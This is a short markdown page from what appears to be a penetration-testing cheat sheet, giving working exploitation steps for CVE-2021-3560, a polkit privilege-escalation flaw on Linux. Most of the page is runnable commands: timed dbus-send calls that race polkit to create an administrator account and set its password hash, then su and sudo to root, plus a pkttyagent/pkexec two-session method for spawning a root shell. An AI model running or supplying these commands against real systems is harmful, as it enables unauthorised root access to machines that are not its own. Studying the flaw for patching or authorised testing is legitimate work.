killchain-compendium/exploit/linux/polkit.md

1.3 KiB

CVE-2021-3560

  • Exploit < 0.105-26ubuntu1.1

Racing Condition

  • Request creation of account via dbus message and pkexec. sleep time is variable.
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:user1 string:"New Account" int32:1 & sleep 0.005s; kill $!
* Create password via `openssl passwd -6 -salt salt password123`
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$salt$cevuzTZ/QBjzuZG0/ebEeedmcTnhyM8ITUu8K032Cp2XvIibq7voqYagm18bwpLBqrg/l/l6YxTmKKibJz5r10' string:'New Password' & sleep 0.005s; kill $!
  • Request is killed after polkits receives it

  • Polkit requests uid of user who sent the message, which has been deleted

  • Error will be thrown

  • Uid turns to root afterwards

  • Request succeeds

  • su user1 and sudo -s

Priv Esc with Two Sessions

  • User has to be member of group sudo
  • Open two ssh sessions
  • In session one check the PID
echo $$
  • In the other session
pkttyagent --process <PID of s1>
  • In session one do
pkexec "/bin/bash"
  • Enter password in session two